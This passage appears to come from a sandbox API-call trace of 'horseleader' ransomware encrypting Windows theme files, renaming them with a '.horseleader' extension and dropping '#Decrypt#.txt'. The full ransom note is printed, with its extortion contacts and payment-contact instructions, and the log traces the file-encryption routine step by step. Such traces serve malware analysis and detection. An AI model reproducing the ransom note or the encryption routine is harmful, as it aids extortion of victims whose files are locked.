lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.823] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, 
lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.823] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.824] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.824] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x1b5a, lpOverlapped=0x0) returned 1 [0247.824] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffe4a6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.824] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x1b5a, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x1b5a, lpOverlapped=0x0) returned 1 [0247.824] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.825] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.825] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.825] CloseHandle (hObject=0x1a4) returned 1 [0247.825] GetProcessHeap () returned 0x780000 [0247.825] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.825] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: 
pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG.horseleader") returned 92 [0247.825] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\thmbnail.png.horseleader")) returned 1 [0247.827] GetProcessHeap () returned 0x780000 [0247.827] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.827] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d4d5410, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0xbb5a, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 0 [0247.827] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0247.827] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\#Decrypt#.txt") returned 81 [0247.827] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0247.828] lstrlenA (lpString="All your files have 
been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0247.828] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0247.830] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0247.830] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0247.830] CloseHandle (hObject=0x158) returned 1 [0247.830] 
GetProcessHeap () returned 0x780000 [0247.830] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dbfd8 | out: hHeap=0x780000) returned 1 [0247.831] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a71ef90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d24dcb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d24dcb0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="SATIN", cAlternateFileName="")) returned 1 [0247.831] lstrcmpiW (lpString1="SATIN", lpString2="Windows") returned -1 [0247.831] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN") returned 65 [0247.831] lstrcmpW (lpString1="SATIN", lpString2=".") returned 1 [0247.831] lstrcmpW (lpString1="SATIN", lpString2="..") returned 1 [0247.831] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0247.831] GetProcessHeap () returned 0x780000 [0247.831] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dbfd8 [0247.831] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\*") returned 67 [0247.831] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a71ef90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d24dcb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d24dcb0, ftLastWriteTime.dwHighDateTime=0x1d301bf, 
nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0247.832] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0247.832] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\.") returned 67 [0247.832] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0247.832] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a71ef90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d24dcb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d24dcb0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0247.832] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0247.832] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\..") returned 68 [0247.832] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0247.832] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0247.832] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5a71ef90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0xe1b, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0247.832] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0247.833] wnsprintfW (in: 
pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF") returned 77 [0247.833] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".horseleader") returned 0x0 [0247.833] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="#Decrypt#.txt") returned 1 [0247.833] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0247.833] lstrlenW (lpString=".testttjffg") returned 11 [0247.833] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF", lpSrch=".testttjffg") returned 0x0 [0247.833] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.833] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.833] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.836] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF") returned 77 [0247.836] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0247.836] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=3611) returned 1 [0247.836] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0xe1b, lpOverlapped=0x0) returned 1 [0247.838] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffff1e5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: 
lpNewFilePointer=0xffffffff) returned 1 [0247.838] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0xe1b, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0xe1b, lpOverlapped=0x0) returned 1 [0247.839] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.839] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.839] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.839] CloseHandle (hObject=0x1a4) returned 1 [0247.839] GetProcessHeap () returned 0x780000 [0247.839] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.839] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF.horseleader") returned 89 [0247.839] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\preview.gif.horseleader")) returned 1 [0247.840] GetProcessHeap () returned 0x780000 [0247.840] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.840] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: 
lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24bfd200, ftCreationTime.dwHighDateTime=0x1cab7f2, ftLastAccessTime.dwLowDateTime=0x6d24dcb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x24bfd200, ftLastWriteTime.dwHighDateTime=0x1cab7f2, nFileSizeHigh=0x0, nFileSizeLow=0x1936f, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="SATIN.ELM", cAlternateFileName="")) returned 1 [0247.840] lstrcmpiW (lpString1="SATIN.ELM", lpString2="Windows") returned -1 [0247.840] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\SATIN.ELM") returned 75 [0247.841] StrStrIW (lpFirst="SATIN.ELM", lpSrch=".horseleader") returned 0x0 [0247.841] lstrcmpW (lpString1="SATIN.ELM", lpString2="#Decrypt#.txt") returned 1 [0247.841] lstrcmpW (lpString1="SATIN.ELM", lpString2="_uninstalling_.png") returned 1 [0247.841] lstrlenW (lpString=".testttjffg") returned 11 [0247.841] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\SATIN.ELM", lpSrch=".testttjffg") returned 0x0 [0247.841] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.841] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.841] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\SATIN.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\satin.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.843] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\SATIN.ELM") returned 75 
[0247.843] StrStrW (lpFirst="SATIN.ELM", lpSrch=".txt") returned 0x0 [0247.843] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=103279) returned 1 [0247.843] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.843] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.846] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.846] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.846] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xa1b7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.846] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.848] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.849] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.849] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x1436f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.849] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, 
lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.849] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.849] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.850] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.850] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.850] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.850] CloseHandle (hObject=0x1a4) returned 1 [0247.850] GetProcessHeap () returned 0x780000 [0247.850] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.850] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\SATIN.ELM.horseleader") returned 87 [0247.850] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\SATIN.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\satin.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\SATIN.ELM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\satin.elm.horseleader")) 
returned 1 [0247.854] GetProcessHeap () returned 0x780000 [0247.854] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.854] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d24dcb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x1c8, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="SATIN.INF", cAlternateFileName="")) returned 1 [0247.854] lstrcmpiW (lpString1="SATIN.INF", lpString2="Windows") returned -1 [0247.854] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\SATIN.INF") returned 75 [0247.854] StrStrIW (lpFirst="SATIN.INF", lpSrch=".horseleader") returned 0x0 [0247.854] lstrcmpW (lpString1="SATIN.INF", lpString2="#Decrypt#.txt") returned 1 [0247.854] lstrcmpW (lpString1="SATIN.INF", lpString2="_uninstalling_.png") returned 1 [0247.854] lstrlenW (lpString=".testttjffg") returned 11 [0247.854] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\SATIN.INF", lpSrch=".testttjffg") returned 0x0 [0247.855] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.855] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.855] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\SATIN.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\satin.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, 
